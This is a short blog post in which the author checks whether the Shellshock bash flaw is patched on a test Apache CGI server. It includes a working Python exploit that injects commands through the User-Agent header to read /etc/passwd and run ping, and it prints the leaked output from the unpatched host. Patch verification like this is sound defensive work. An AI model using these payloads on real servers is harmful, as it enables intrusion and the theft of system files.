lost and found ( for me ? )

lost and found ( for me ? )

↑ Grab this Headline Animator

bash vulnerability ( CVE-2014-6271 and CVE-2014-7169 )

Here are logs when I checked to see if this is fixed in my machine.
client (python script ) --- apache + cgi
[ unpatched versions  ]
# bash --version
bash --version
GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)
this script tries to execute cat /etc/passwd and ping command.
# cat http_request.py
#!/usr/bin/env python

import requests

url = 'http://192.168.11.8/example2.cgi'

headers1 = {
   'User-Agent':'() { test;};echo "Content-type: text/plain"; echo; echo; /bin/cat /etc/passwd',
}

headers2 = {
   'User-Agent':'() { test;}; echo "Content-type: text/plain"; echo; echo; /bin/ping -c 3 192.168.11.1',
}

r = requests.get(url, headers=headers1)
print r.text

r = requests.get(url, headers=headers2)
print r.text


# ./http_request.py
first request


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin


done!

second request


PING 192.168.11.1 (192.168.11.1) 56(84) bytes of data.
64 bytes from 192.168.11.1: icmp_seq=1 ttl=64 time=13.6 ms
64 bytes from 192.168.11.1: icmp_seq=2 ttl=64 time=1.59 ms
64 bytes from 192.168.11.1: icmp_seq=3 ttl=64 time=6.83 ms

--- 192.168.11.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 1.598/7.363/13.656/4.937 ms

done!
[ patched versions ]
# bash --version
bash --version
GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)


# ./http_request.py
first request


Hi

done!

second request


Hi

done!
[ apache cgi configuration ]
# tail -1 /etc/lsb-release  
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"


/etc/apache2/sites-available/000-default.conf

             <Directory /var/www/html/>
               Options Indexes FollowSymLinks MultiViews ExecCGI
               AllowOverride None
               Order allow,deny
               allow from all
           </Directory>


/etc/apache2/mods-enabled/mime.conf
   AddHandler cgi-script .cgi .py .pl .rb


# a2enmod cgi

# /etc/init.d/apache2 restart

# cat /var/www/html/example2.cgi
#!/bin/bash
echo "Content-type: text/plain"
echo
echo
echo "Hi"

# chmod 705 /var/www/html/example2.cgi

Labels: , ,

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.

Subscribe to: Post Comments (Atom)